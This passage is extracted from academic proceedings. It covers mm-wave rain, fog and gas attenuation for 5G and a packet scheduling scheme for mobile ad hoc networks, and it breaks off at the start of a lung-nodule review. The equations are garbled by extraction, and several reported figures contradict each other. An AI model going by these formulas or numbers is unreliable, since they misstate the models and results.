and minimally latency-requiring applications [1]. The millimeter (mm) wave will be
used in a substantial way to satisfy the requirement for large bandwidth. At the mm-
wave propagation, atmospheric losses between 28 and 38 GHz do not significantly
add more loss to the path loss that is considered lead to communications for 5G but
in the higher frequency range of mm-Wave, atmospheric absorption occurs which is
used for 5G connectivity deployment in near future. Propagation studies have been
carried out to test the impact of total path loss at 28 and 38 GHz and that only for the
consequences of rain fading at mm-wave band. For the better deployment of the 5G
mobile network in the future, there is a requirement of evaluating the effect of rain,
foliage, and other atmospheric attenuation on the output of the cellular mm-wave
system for higher frequency ranges. These groups have certain constraints like these
cannot travel significant distances and cannot enter structures and different items.
These restrictions can be profitably misused to give safer correspondence and grant
high-frequency reuse [2–5].
This paper finds the engendering attributes of mm-Waves and the impact of outer
elements like air gases, rain, foliage, and diffraction and proposed data-driven compu-
tational intelligence-based generic framework to optimize quality of service (QoS)
parameters such as bandwidth and path loss. Our fundamental focus will be to
consider the impact of these components on the spread of mm-Wave frequencies
to be utilized for 5G cell organizations. We assess the attenuation because of envi-
ronmental gases, rain, and foliage at different mm-Wave frequencies which should
be utilized in 5G cell organizations.
Our investigation has done by simulating using MATLAB and use ITU-R P.676–
10 models to calculate attenuation due to fog, rain, and atmospheric gases.
Millimeter (mm) Wave Propagation—The mm-wave communication systems are
widely used in today ‘s world which provides solutions with restricted bandwidth
with high-demand superior data rate for mobile communications. Mm-Waves are
waves having wavelengths ranges from 1 to 100 mm with bandwidth up to 10 Gbit/s
[6]. This band has the potential to fulfill the requirements of 5G communications [7].
In the literature, various researchers have been studied the effect of the atmospheric
fading only for few frequency bands of mm-Wave but we consider the whole mm-
Wave band. The 5G is started in 2006 by China with a 59 –64 GHz RF band [8].
Furthermore, RF bands range 40.5–42.3 GHz and 48.4–50.2 GHz, used for light
license management, while for communication, unlicensed management RF bands
range 42.3–47 GHz and 47.2–48.4 GHz are used [8]. In 2010, the Chinese wireless
personal access network (CWPAN) standard working group, set up ITU-T Study
Group 5 (SG5), also called SG5 QLINKPAN, to investigate the feasibility of a 45 GHz
RF band for different application. In China, the issued 60 GHz involves of 5 GHz
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 523

of the contiguous, mm-Wave at 59–64 GHz band. Early 2017, South Korea issued a
national broadband plan which suggests the possibility to extend the spectrum in the
28 GHz band by up to 2 GHz to provide access to a total of 3 GHz, 26.5–29.5 GHz.
In 2018, South Korea decided to own an auction of mm-Wave 5G with 2400 MHz
bandwidth in the 28 GHz band for three mobile operators [9, 10]. In late 2018, the
three national mobile network operators (MNOs) initiated 5G technology having
mobile hot spots in South Korea (SK Telecom, Korea Telecom (KT), and LGU + ).
The main contribution of this paper is to investigate the effect of rain, fog, cloud, and
atmospheric gases on the whole frequency range at different atmospheric conditions;
apart from this, we suggest a computational framework. After the introduction, this
paper is systematized as follows. Section 2 analyzes the effect due to atmospheric
gas. Section 3 analyzes the effect due to fog and cloud. Section 4 analyzes the effect
due to rain. Section 5 discusses the proposed generic framework with a simulation
study. Finally, this paper is concluded in Sect. 6, and a few outlines are highlighted
as the future scope and work.

2 Investigate the Effect of Attenuation Due to Atmospheric


Gas

This signal’s attenuation which propagates through gases present in the atmosphere
is computed. Electromagnetic (EM) signals weaken when they engender through
the atmosphere. This impact is expected basically to the resonance lines of oxygen
and water vapor, with small loss due to nitrogen gas [11]. The model additionally
incorporates a ceaseless retention range under 10 GHz. For frequencies ranging
from 1–1000 GHz and applying to polarized and non-polarized fields, this model is
available. The equation for this model with specific attenuation at each frequency is
given by Eq. 1

γ = γo ( f ) + γw ( f ) = 0.1820 f N  ( f ) (1)

where N"() is the imaginary part of the complex number and contains a continuous
part and a spectral line is given by Eq. 2

 
N (f) = Si Fi + N D ( f ) (2)
i
524 A. Tripathi et al.

The spectral element contains the summation of a discrete spectrum comprised


of a frequency bandwidth which is localized, function, F(f)i , increased by a spectral
line intensity, Si , Each spectral line intensities is given by Eq. 3 for oxygen of the
atmosphere
 3   
300 300
Si = a1 × 10−7 exp a2 1 − ( P (3)
T T

Each spectral line intensities are given by Eq. 4 for atmospheric water vapor.
 3.5   
300 300
Si = b1 × 10−1 exp b2 1 − ( W (4)
T T

P Pressure of dry air


W Partial pressure of water vapor (HectoPascals)
T Ambient temperature (Degree Kelvin)
The partial pressure of water vapor, W, is attached to the density of vapor (ρ)
which is given in Eq. 5

ρT
W = (5)
216.7
P + W is total atmospheric pressure.
To calculate the overall attenuation for narrowband signals on a path, the mathe-
matical relation increases the specific attenuation by the length of the path, R. Then,
the overall attenuation is L g = R(γo + γw ).

3 Investigate the Effect of Attenuation Due to Fog


and Cloud

In this model, different function applies the cloud and fog attenuation model of the
“International Telecommunication Union (ITU)” to measure the attenuation due to
cloud and fog of signal propagation. Model based on parameters which are signal
path length, signal frequency, liquid water density, and ambient temperature. This
feature refers to instances where the direction of the signal is completely contained
in a uniform fog or cloud environment. Along the signal path, the density of liquid
water does not differ.
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 525

The attenuation of signals that spread through fog or clouds is determined by this
model. ITU model, ITU-R P.840–6 Recommendation: The model measures the real
attenuation (dB/km) of the signal in polarized and non-polarized fields [12]. The
expression for specific attenuation at every frequency is given by Eq. 6

γc = kl ( f )M (6)

where

M liquid water (gm/m3 )


The specific attenuation coefficient is the quantity kl ( f ) which depends on
frequency.

4 Investigate the Effect of Attenuation Due to Rainfall


Attenuation

We use the rainfall attenuation model of the International Telecommunication Union


(ITU) to quantify path loss of signals propagating in rainfall areas. The attenuation of
signals propagating across regions of rainfall is determined by this model. The atten-
uation of rain is the dominant mechanism for fading that can differ from place to place
and from time to time. When propagating through an area of rainfall, electromag-
netic signals are attenuated. The attenuation of rainfall is determined according to the
rainfall formula of the ITU Recommendation ITU-R P.838–3: Specific attenuation
model for rain for using in prediction methods [13]. As a function of rainfall intensity,
signal frequency, polarization, and path elevation angle, the model computes the real
attenuation (attenuation per kilometer) of a signal. The attenuation, γR , concerning
to rain rate is modeled as power-law known as specific attenuation which is given by
Eq. 7

γR = k Rα (7)

where

R Rate of rainfall (millimeters/hour)


526 A. Tripathi et al.

The parametric quantity k and exponent α depends on the signal path’s frequency,
angle of elevation, and condition of polarization.
The effective propagation distance,deff. and real attenuation multiplies in this equa-
tion to calculate the overall attenuation for narrowband signals along a path. Then, L
= deff γ R is the absolute attenuation.
The efficacious distance is a product of geometrical distance, d, and scale
component

1
r= (8)
0.477d 0.633R0.01 f 0.123 − 10.579(1 − exp(−0.024d))
0.73a

where

f frequency

5 Simulation Work and Discussion

In this section, we describe our simulation work is done. We obtain the attenuation
due to atmospheric gases, clouds, and rain at different rain rates [16, 17]. We have
divided the whole mm-Wave band into different frequency range to understand the
result easily. First, we investigate the attenuation due to atmospheric gases, divided
the whole mm-Wave into 20–50 GHz, 50–100 GHz, 100–200 GHz, and 200–300Ghz
band to examine the result easily. Proposed framework—Based on previous data
analysis and collection data-driven, framework will be proposed in the future which
will optimize required quality of service (QoS) parameters.
The framework is as follows.
General framework using computational intelligence:
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 527

Initialization of algorithm-specific parameters by


different scenario

Collect the stats of simulation for each scenario


over data-set

Calculate QoS parameters by using the stats


obtained the previous stage

The result obtained in previous stage is captured

Apply visualization and optimization tool to


compare the algorithm using computational
Intelligence

In Fig. 1, the graph shows the attenuation for frequency range 20–50 GHz, and
there are two lines in the graph one is blue other one is red. Blue lines are showing
the absorption due to oxygen and air with water density of 7 g/m3 and the red line
showing attenuation due to oxygen and dry air which has zero water density. They
clearly show that signal attenuation due to air with water density than the dry air. In
the frequency range 20–50 GHz, attenuation is not significantly high but in Fig. 2,
it clearly shows that at 60GHz, attenuation is 14.65 dB which is not suitable for 5G
cellular networks. In Fig. 3, there are two peaks in the graph at frequency 120 GHz
where specific attenuation 2 dB which is not stressful but at frequency 183 GHz loss
528 A. Tripathi et al.

Fig. 1 Gas attenuation for frequency 20–50 GHz

Fig. 2 Gas attenuation for frequency 50–100 GHz

due to atmospheric gases is 28.34 dB which is significantly high. Figure 4 shows the
graph for 200–300 GHz frequency, where the losses are not very fluctuating.
After investigating attenuation due to atmospheric gases, we investigate the effect
of fog and cloud and calculate the attenuation of signals that spread through a cloud
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 529

Fig. 3 Gas attenuation for frequency 100–200 GHz

Fig. 4 Gas attenuation for frequency 200–300 GHz


530 A. Tripathi et al.

Fig. 5 Fog attenuation for frequency 20–300 GHz

1 km long at an altitude of 1000 m. For frequencies from 20 to 300 GHz, measure


the attenuation. For the water density of cloud liquid, a typical value is 0.4 g/mm.
Figure 5 shows that fog attenuation increasing with the increase in frequency in
dB/km. Then, we investigate the effect of rain on the mm-Wave frequencies. We
select three rain rates, i.e., 10, 15, and 20 mm/hour at frequency range 20–300 GHz.
In Figs. 6, 7, and 8, we can see that the attenuation is increasing with the increase in
rain rate. At frequency 40 GHz in all three Figs. 6, 7, and 8, attenuation is 5.2, 7.2,
and 9.0 dB, respectively. After 105 GHz, attenuation is started decreasing.

6 Conclusion and Future Scope

Technologies for wireless networking are rising increasingly to satisfy increasing


usage requirements. The burden on current wireless systems has increased expo-
nentially due to numerous mobile devices, multimedia applications with a high data
rate, audio and video streaming in high definition (HD) and the number of users of
wireless communication systems continues to increase. At the same time, the usage
of data per user has increased. This paper has studied and analyzed the impact of
these variables on the propagation of mm-Wave frequency. Further, it also measures
the damages due to gases in the atmosphere, rain, and foliage at frequencies that are
unlikely to be used in 5G cellular networks [18, 19]. Besides this, we suggest data-
driven computational intelligence generic framework to optimize quality of services
(QoS) parameters such as bandwidth and path loss by artificial rain and dust [20]. In
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 531

Fig. 6 Rain attenuation for frequency 20–300 GHz at rain rate 10 mm/hr

Fig. 7 Rain attenuation for frequency 20–300 GHz at rain rate 15 mm/hr
532 A. Tripathi et al.

Fig. 8 Rain attenuation for frequency 20–300 GHz at rain rate 20 mm/hr

the future, we will develop different data-driven and mathematical models to address
the problem using computational intelligence frameworks.

References

1. Rappaport, T., et al. (2013). Millimeter wave mobile communications for 5Gcellular: It will
work! IEEE Access, 1, 335–349.
2. Marcus, M., & Pattan, B. (2005). Millimeter wave propagation: Spectrum management
implications. IEEE Microwave Magnetic, 6(2), 54–62.
3. Pi, Z., & Khan, F. (2011). An introduction to millimeter-wave mobile broadband systems.
Communications Magazine, IEEE, 49(6), 101–107.
4. Wheeler, Tom. “Leading Towards Next Generation “5G” Mobile Services”. Federal Commu-
nications Commission. Federal Communications Commission. Retrieved 25 July2016.
5. Yong, L., Depeng, J., Li, S., & Athanasios, V. V. (2015). A survey of millimeter wave (mmWave)
communications for 5G: opportunities and challenges (pp. 1–20)
6. Rappaport, T. S. et al. (2015) In Millimeter wave wireless communications. Pearson Education.
7. Uwaechia, A. N., & Mahyuddin, N. M. (2020). A comprehensive survey on millimeter
wave communications for fifth-generation wireless networks: feasibility and challenges. IEEE
Access, 8, 62367–62414.
8. Haiming, W., Wei, H., Jixin, C., Bo, S., & Xiaoming, P. (2014). IEEE 802.11aj (45 GHz):
A new very high throughput millimeter-wave WLAN system. China Communications, 11(6),
51–62.
9. Kürner, T., & Priebe, S. (2014). Towards THz communications-status in research standardiza-
tion and regulation. Journal Infrastructure Millimeter THz Waves, 35(1), 53–62.
10. Current 5G Commercial Network Including Current 5G Research (2019, December 12) 5G
Field Testing/5G Trials, and 5G Development by Country.
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 533

11. Radiocommunication Sector of International Telecommunication Union .(2013). Recommen-


dation ITU-R P.676–10: Attenuation by atmospheric gases.
12. Radiocommunication Sector of International Telecommunication Union .(2013). Recommen-
dation ITU-R P.840–6: Attenuation due to clouds and fog.
13. Radiocommunication Sector of International Telecommunication Union .(2005). Recommen-
dation ITU-R P.838–3: Specificattenuation model for rain for use in prediction methods.
14. Radiocommunication Sector of International Telecommunication Union. (2017). Recommen-
dation ITU-R P.530–17: Propagation data and prediction methods required for the design of
terrestrial line-of-sight systems.
15. Recommendation ITU-R P.837–7 Characteristics of precipitation for propagation modeling.
16. Das, D., & Maitra, A. (2015). Rain attenuation prediction during rain events in different climatic
regions. Journal Atmosphere Solar-Terrestrial Physics, 128(1), 1–7.
17. Zhao, Q., & Li, J. (2006, October). Rain attenuation in millimeter wave ranges. In Proceedings
IEEE International Symposium Antennas, Propagation, and EM Theory.
18. Lam, H. Y., Luini, L., Din, J., et al. (2017). Impact of rain attenuation on 5G millimeter
wave communication systems in equatorial Malaysia investigated through disdrometer data’.
In European Conference Proceedings Antennas and Propagation (EuCAP), Paris France,
(pp. 1793–1797).
19. Tataria, H., Haneda, K., Molisch, A. F., Shafi, M., & Tufvesson, F. (2020). Standardization
of propagation models for terrestrial cellular systems: A historical perspective. International
Journal of Wireless Information Networks, 1–25.
20. Shafi, M., Jha, R. K., & Sabraj, M. (2020). A survey on security issues of 5G NR: Perspective
of artificial dust and artificial rain. Journal of Network and Computer Applications, 102597.
Packet Scheduling Algorithm
to improvise the Packet Delivery Ratio
in Mobile Ad hoc Networks

Suresh Kurumbanshi, Shubhangi Rathkanthiwar, and Shashikant Patil

Abstract Due to recent advances in wireless communications technologies and its


changing demand in mobile ad hoc networks, it is needed to design energy efficient
network. These networks are autonomous and continuously monitored using various
sensors creating IOT hub. Due to network scalability and irregular connectivity, it may
face issues of limited battery power and sharing bandwidth among users. Improving
packet delivery of mobile networks and with less power is always a challenging
task. This paper suggests novel packet scheduling algorithm to improvise the packet
delivery of network. In this paper, ad hoc networks are deployed for mobile nodes, and
packets are scheduled using novel packet scheduling algorithm. Packet scheduling
is done by adjusting its interarrival time using Paretos burst time parameter. This
approach targets at balancing data collections of IOT networks and improves packet
delivery and residual energy of network. Simulated results in NS2 are presented for
mobile nodes deployed in grid scenario, and packet delivery ratio of the network is
improved using proposed packet scheduling algorithm.

Keywords Mobile networks · Packet scheduling · Packet delivery ratio · Residual


energy · Pareto

1 Introduction

In today’s era, ongoing requirements of mobile data collection within the IOT-enabled
networks place challenges in designing energy efficient networks, communication
types, topology of network, and scheduling packets for effective data delivery.
Some of structures and deployments of nodes are suggested [1–3]. Looking into
the daily requirements, there is a tremendous growth in multimedia devices. These

S. Kurumbanshi (B) · S. Patil


Department of Electronics and Telecommunication Engineering, MPSTME, NMIMS University,
Shirpur Campus, Sawalde, India
S. Rathkanthiwar
Department of Electronics Engineering, YCCE, Nagpur, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 535
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_43
536 S. Kurumbanshi et al.

devices produces data which is useful in designing sensors for IOT-enabled networks.
Number of sensors connected to IOT networks have reached almost 24 billion in 2020
[4, 5].
The sensors generate data from various collection units such as bridge, roads, and
street lamps. Therefore, collecting multimedia data from nodes becomes an important
concern in the IoTs. Limited delivery range of the sensor will neither satisfies the
user demands nor does it provide supports for the multimedia enabled big data
applications. Deployment of data sensors and deploying its related communication
technologies requires high cost. One of effective way to address this issue is to deploy
mobile nodes scenario for data collection and transmits the multimedia data while
moving [6]. The hybrid protocols (HWMP) have been developed operating at layer 2
in the IEEE standard. It includes mesh points which are connected to gateways which
are more efficient in avoiding congestion of the network [7]. Load balancing method
reduces congestion effectively in networks. In wireless mesh networks, traffic is
distributed to various paths having least congestion and achieves better performance
[8, 9]. Some of routing methods are suggested to balance the routing load and improve
link quality for the the ad hoc networks. [10–15].
In multi-path routing mechanisms, routing metrics are suggested considering the
quality of wireless link [16, 17], energy of neighboring nodes and interference [18],
AOMDV (QLB-AOMDV) and QOS in [19], and load balanced congestion adaptive
routing in [20]. These routing algorithms having higher overheads and are suitable
for ad hoc network in moving nodes.

2 Related Work

In designing and deploying energy efficient intelligent transportation systems, mobile


ad hoc networks become the main element of intelligent transport systems (ITS). It
faces many challenging issues including instability of wireless communications,
architecture inflexibility, limited transmission range, and repetitive variations in
topology of nodes due to very high mobility of nodes. One of the latest challenge
VANET faces is establishing effective data transmission to a nearby areas where road
side unit are not in place called communication coverage holes [21].
Nowadays in intelligent transportation systems, performance and efficiency of
vehicular ad hoc networks are affected. Finding the best routing protocol in dynamic
vehicular networks is one of important challenging issue. Ant colony hybrid routing
protocol (ACOHRP) is suggested to improvise the quality of service of intelligent
transportation IT’S, by enhancing the reliability and efficiency of vehicle traffic
information message transmission [22]. Quality of service of the network is improved
using optimal energy consumption protocol. Residual hop count, residual energy, and
expected delay are the metrics which identifies the next node while forwarding the
packets. Fuzzy logic is useful, while aggregating the data and computational values
of the above parameter is used to identify the forwarding node. Simulation is carried
Packet Scheduling Algorithm to improvise the Packet Delivery … 537

using NS 2, and it proves that OECP has higher packet delivery ratio with lower
energy consumption and end to end delay [23].
For quick changing topology, RPL-based IOT network is proposed to reduce the
power consumption. Mobility level for a node is defined in RPL network to estimate
the movement of neighboring node. The node does the adjustment of the interval of
control messages depending on the mobility level value. This way allows path will
be updated, and it helps to reduce the power consumption.

3 Methodology

Looking into the ongoing demand of IOT-enabled network and various advancements
of mobile networks, it is needed to propose energy efficient battery management tech-
nique. We propose mobile ad hoc network for grid scenario in which scheduling of
packets is controlled using Pareto and exponential distribution, while setting interar-
rival time between packets. In the proposed network, probability distribution func-
tion and cumulative distribution functions are derived for Pareto and exponential
functions. Cumulative distribution function of Pareto distributed traffic and expo-
nentially distributed traffic has uniform energy density. Due to this reason, packets
are scheduled uniformly with less consumption of energy.
Figure 1 shows the proposed methodology of packet scheduling algorithm where
networks of varying node scenario are tested using DSR and proposed DSR with
Pareto and DSR with exponential distribution. Packet delivery and residual energy
of the proposed algorithm are compared with existing DSR protocol.

Fig. 1 Proposed
methodology
538 S. Kurumbanshi et al.

Algorithm

Input to wireless network Network performance parameters


Input—1: select number of nodes < n1, n2,., Info: For a mobile network
tn > belonging to the network 19. Start
Design Network 20. Analyze TCL file with AWK Script
1. Start 21 Calculate number of packets send;
2. For each node in Network do 22. Calculate number of packet received;
3. (1.1) Select MAC 23. Calculate packet delivery ratio
4. (1.2) Select Antenna 24. Calculate average residual energy
5. (1.3) IFQ length 25.Calculate overall residual energy
6. (1.4 Propagation 26. Calculate total energy consumption
7. (1.5) Topographical dimensions 27. End For
8. (1.6) Transmit power 28. End
9. (1.7) Receiving power Output: Packet delivery ratio/average residual
10 (1.8) Sense power energy/overall residual energy
11. (1.9) Ideal power
Input 2:-
12.Start
13. For each Node in the Network do
14. (2.1) Deploy nodes in grid fashion
15. (2.2) Assign transmission to nodes
16. (2.3) Assign receiving nodes
17. (2.4) Assign velocity to nodes
18. (2.6) Simulate network tcl script

4 Results

Networks are proposed for mobile nodes to observe and test the performance of
packet scheduling algorithm for packet delivery and residual energy of network.
Ad hoc network is set for 50 moving nodes in grid scenario with the configuration
parameters specified in Table 1. Network density is varied from 10 to 50 nodes.
Network is simulated for 10 s in NS2. Network is tested for various performance
parameters for DSR, DSR with Pareto, and DSR with exponential arrival pattern of
packets as explained in Table 4. Figure 2 shows the network set up for 50 mobile
nodes in grid scenario. Network topography is configured for 4700¿ 472 m. Network
is simulated for 10 s. Node movements are also created with pause time as 10 s and
velocity as 20 m/second for nodes n0, n1, n2, n3, n4, n5, n6, n7, n8, n9, n20, n21,
n22, n23, n24, n25, n26, n27, n28 and n29 (Tables 2 and 3).
Performance of the network is tested for 50 mobile nodes with DSR, DSR with
Pareto, and DSR with exponential method as discussed in Table 4. Results show that
packet delivery of the network is improved from 93.58 to 95.55% in case of DSR
with Pareto with good amount of residual energy. Also packet delivery is improved
from 93.58 to 97.54% with exponential distribution and improvement in residual
energy from 4.05 to 4.14 J.
Packet Scheduling Algorithm to improvise the Packet Delivery … 539

Table 1 Configuration
Sr. No Parameter Value
parameters for wireless ad
hoc network 50 mobile nodes 1 Channel Wireless channel
in grid topology 2 Propagation Two ray
ground
3 MAC 802_11
4 Antenna Omni antenna
5 Number of nodes 50
6 IFQ length 50
7 Routing protocol DSR
8 X(m) 4007
9 Y(m) 100
10 Simulation time(s) 10.0
11 Initial energy (J) 5
12 Txpower (W) 0.9
13 Rxpower (W) 0.8
14 Sensepower (W) 0.0175
15 Idle power (W) 0.0

Fig. 2 NAM file of 50 nodes in grid scenario

Table 2 Parameters of Pareto


Sr. No Parameter Value
distribution for 50 nodes
1 PKT Size 210
2 Burst time (ms) 500
3 Idle time (ms) 500
4 Rate (K) 1
5 Shape 1.2
540 S. Kurumbanshi et al.

Table 3 Parameters of
Sr. No Parameter Value
exponential distribution for
50 nodes 1 PKT size 100
2 Burst time (ms) 500
3 Idle time (ms) 500
4 Rate (K) 1

Table 4 Performance comparison of DSR, DSR with Pareto, and DSR with exponential for 50
nodes
Sr.No Parameter Value for DSR Value for DSR with Value for DSR with
Pareto Expo
1 Number of packets 1667 1545 1665
send (Bytes)
2 Number of packets 1590 1482 1624
received (Bytes)
3 PDR (%) 93.58 95.95 97.54
4 Total energy 46.25 46.85 41.42
consumption (Joule)
5 Average energy 94.39 0.95 0.85
consumption (Joule)
6 Overall residual 198.7 196 203.04
energy (Joule)
7 Average residual 4.05 4.04 4.14
energy (Joule)

Figure 3 shows the NAM file deployed for 40 mobile nodes. Network topography
is set for 5894 ¿428 m. Network is simulated for 10 s. Node movements are also
created with pause time as 10 s and velocity as 20 m/second for nodes n0, n1, n2,
n3, n4, n5, n6, n7, n8, n9, n20, n21, n22, n23, n24, n25, n26, n27, n28, and n29.
Performance of the network is tested for 40 mobile nodes with DSR protocol, DSR
with Pareto, and DSR with exponential approach is specified in Table 5.
It shows that packet delivery is improved from 67.02 to 89.22% in case of DSR
with Pareto approach, and residual energy is improved from 3.74 to 4.05 J. Also
packet delivery of the network is improved from 67.02 to 83.37% for DSR with
exponential approach, and residual energy is improved from 3.74 to 3.96 J.

5 Conclusion

In this paper, a novel packet scheduling algorithm is proposed to improve the packet
delivery ratio and residual energy of IOT-enabled networks. In contrast to the previous
Packet Scheduling Algorithm to improvise the Packet Delivery … 541

Fig. 3 NAM file of 40 nodes in grid scenario

Table 5 Performance parameters for DSR, DSR with Pareto, and DSR with exponential for 40
mobile nodes in mobile scenario
Sr Parameter Value for DSR Value for DSR with Value for DSR with
Pareto exponential
1 Number of packets 1331 1568 1684
send(Bytes)
2 Number of packets 892 1399 1404
received(Bytes)
3 PDR (%) 67.02 89.22 83.37
4 Total energy 49.08 36.91 40.14
consumption (Joule)
5 Average energy 1.25 0.946 1.029
consumption (Joule)
6 Overall residual 145.892 158.06 154.83
energy (Joule)
7 Average residual 3.74 4.05 3.96
energy (Joule)
542 S. Kurumbanshi et al.

studies, our scheme combines traffic data scheduling with proposed Pareto and expo-
nentially distributed traffic to form a routing policy. Packet delivery of the network is
improved around 17% than normal routing using DSR. Energy saving is done even at
a higher packet delivery ratio of the network. Packets scheduling is done uniformly
using cumulative distribution function, and energy parameters is proportional to
cumulative distribution function so does energy saving using proposed approach.

References

1. Ang, L.-M., Seng, K. P., Zungeru, A. M., & Ijemaru, G. K. (2017). Big sensor data systems
for smart cities. IEEE Internet of Things Journal, 4(5), 1259–1271.
2. Liu, X., Liu, Y., Liu, A., & Yang, L. (2019) Defending on-off attacks using light probing
messages in smart sensors for industrial communication systems. IEEE Transactions Industrial
Information, to be published. https://doi.org/10.1109/TII.2018.2836150
3. Feng, T.-H., Li, W. T., & Hwang, M.-S. (2015). A false data report filtering scheme in wireless
sensor networks: A survey. International Journal Network Security, 17(3), 229–236.
4. Huang, M., Liu, A., Xiong, N. N., Wang, T., & Vasilakos, A. V. (2018). A low-latency commu-
nication scheme for mobile wireless sensor control systems. In IEEE Transactions Systems
Management Cybernetics Systems, to be published. https://doi.org/10.1109/TSMC.2018.283
3204
5. Shen, V. R. L., Shen, R.-K., & Yang, C.-Y. (2016). Cost optimization of a path protection system
with partial bandwidth using petri nets. Wireless Personal Communications, 90(3), 1239–1259.
6. Li, T., Tian, S., Liu, A., Liu, H., & Pei, T. (2018). DDSV: optimizing delay and delivery ratio
for multimedia big data collection in mobile sensing vehicles. IEEE Internet of Things Journal,
5(5).
7. Hu, M., Zhang, J., & Yue, G. (2010). A novel load balancing scheme for hybrid routing protocol
in IEEE 802 11 mesh networks. In 3rd IEEE International Conference Broadband Networking
Multimedia Technology (pp. 664–648).
8. Jung, W. J., Lee, J. Y., & Kim, B. C. (2014). Joint link scheduling and routing for
load balancing in STDMA wireless mesh networks. International Journal Communications
Networks Information Security, 6(3), 246–252.
9. Nguyen, L. T., Beuran, R., & Shinoda, Y. (2008). A load-aware routing metric for wireless
mesh networks. IEEE Computers and Communications (ISCC), 429–435.
10. Chen, J., Li, Z., Liu, J., & Kuo, Y. (2011) QoS multipath routing protocol based on cross layer
design for ad hoc networks. In 2011 International Conference Internet Computing Information
Services (Vol 1, no. 2, pp. 261–264).
11. Gopalan, N. P. (2009). A QoS-based robust multipath routing protocol for mobile adhoc
networks. In First Asian Himalayas International Conference Internet 2009, AH-IC.
12. Ktari, S., Labiod, H., & Frikha, M. (2006). Load balanced multipath routing in mobile ad hoc
network. In 10th IEEE Singapore International Conference Communications Systems. ICCS
2006 (pp. 1–5).
13. Maleki, H., Kargahi, M., & Jabbehdari, S. (2014). RTLB-DSR: a loadbalancing DSR based
QoS routing protocol in MANETs. In Proceedings 4th International Conference Computing
Knowledge Engineering ICCKE 2014 (pp. 728–735).
14. Mallapur, S. V., Patil, S. R., Agarkhed, J. V. (2015). Multipath load balancing tech nique for
congestion control in mobile ad hoc networks. In 2015 Fifth International Conference Advanced
Computing Communications (pp. 204–209).
15. Yamaguchi, K., Nagahashi, T., Akiyama, T., Yamaguchi, T., & Matsue, H. (2016). A routing
based on OLSR with traffic load balancing and QoS for Wi-Fi mesh network. In International
Conference Information Networking vol. 2016–March (pp. 102–107).
Packet Scheduling Algorithm to improvise the Packet Delivery … 543

16. Gomez, K., Riggio, R., Rasheed, T., & Chlamtac, I. (2011). On efficient airtime—based fair link
scheduling in IEEE 802. 11-based wireless networks. In IEEE 22nd International Symposium
Personality Indoor Mobility Radio Communications (pp. 930–934).
17. Javaid, N., Ahmad, A., Imran, M., Alhamed, A. A., & Guizani, M. (2016). BIETX: a new
quality link metric for static wireless multi-hop networks. In 2016 International Wireless
Communications Mobile Computing Conference IWCMC, (Vol 1, pp. 784–789).
18. Sujatha, A. D., Terdal, P., Mytri, V. D. (2012). A link quality based dispersity routing al gorithm
for mobile ad hoc networks. International Journal of Computer Network and Information
Security (IJCNIS). [Online] Available http://www.mecspress.org/ijcnis/ijcnis-v4-n9/v4n9-3.
html
19. Tekaya, M., Tabbane, N., Tabbane, S., & Supérieure, E. (2010). Multipath routing with load
balancing and QoS in ad hoc network. 10(8), 280–286.
20. Kim, J., Tomar, G. S., Shrivastava, L., Bhadauria, S. S., & Lee, W. (2014) Load balanced
congestion adaptive routing for mobile ad hoc networks. (Vol. 2014).
21. Noorani, N., & Seno, S. A. H. (2018). Routing in VANETs based on in tersection using SDN
and fog computing. In 8th International Conference on Computer and Knowledge Engineering
(ICCKE 2018), October 25–26, Ferdowsi University of Mashhad.
22. Khoza, E., Tu, C., & Adewale Owolawi, P. (2018). An ant colony hybrid routing protocol for
VANET, 6–7 December.
23. Lakshmi Prabha, K., & Selvan, S. (2019). Optimal energy consumption protocol to improve Qos
in delay tolerant networks. In 2019 1st international Conference on Innovations in Information
and Communication Technologies.

Dr. Suresh Kurumbanshi is working as Assistant Professor in


NMIMS University Shirpur Campus.His research area includes
Wire-less Adhoc networks, Industrial IOT and Automation.
He has more than 20 years of teaching experience. He has
been granted RPS grant for carrying research on Computational
capacity of vehicular adhoc networks. He is a reviewer of IEEE
Circuits and system and IEEE Access. He is a certified trainer in
Automation Technology for Bosch Rexroth Centre of Excellence
in Automation.
544 S. Kurumbanshi et al.

Dr. Shubhangi Vikas Rathkanthiwar is presently working as


Professor in the Department of Electronics Engineering, YCCE,
Nagpur, India. Her area of expertise is Wireless Communica-
tions and Soft Computing. She has 80 research papers in her
credit. Her book ‘An intelligent Wireless LAN system: Perfor-
mance evaluation in fading multipath environment’ is published
in Germany. She is recognized reviewer of Journal of Applied
Soft Computing, Elsevier, IEEE trans-actions on Vehicular Tech-
nology and IEEE transactions on Industrial Electronics. She has
granted patent on Performance improvement of OFDM Trans
receiver system through self-organizing artificial neural network
by Government of India. She is recipient of Best research paper
award, Best Teacher award and ‘Shikshak Ratna award’.

Prof. Shashikant Patil (Senior Member IEEE & Senior


Member, ACM) is a prominent educationist, Teacher, renowned
Engi-neer, researcher and Innovator. He has received numerous
accolades for his valuable contributions and achievements in
education and re-search. Prof Patil is nominated as Fellow
Member of IETE(FIETE); Fellow of Institute of Biomedical
Engineers (FIBE); Fellow of Optical Society of India (FOSI)
and Institution of Engineers India (FIE). He is also designated as
a Chartered of Institution of Engineers (C.Eng.). Presently he is
working as an Associate Professor in SVKMs NMIMS Mumbai,
India. Additionally he is also serving as an Associ-ate Editor,
Editorial Board Member, Technical Advisory Board Mem-ber,
Potential Peer Reviewer and Journal Referee with Scopus and
SCI indexed Journals. He is also having an association with
Elsevier Editorial Series, Taylor and Francis, Springer Link
Journals as a po-tential Peer Reviewer and Journal Referee.
Besides this he is an active reviewer for many IEEE Conferences
of International Repute.
Computer-Aided Detection
and Diagnosis of Lung Nodules Using CT
Scan Images: An Analytical Review

Nikhat Ali and Jyotsna Yadav

Abstract Cancer is one of the leading causes of mortality worldwide, lung cancer
being one of the deadliest. Early detection and accurate diagnosis of lung nodules
can save many lives and resources. Number of diagnostic radiology utilized for
detection of lung nodules of which computed tomography (CT) scans provide better
discernment of disease, thus explored extensively for the automatic nodule analysis.
However, manual analysis of radiological images is time-consuming and prone to
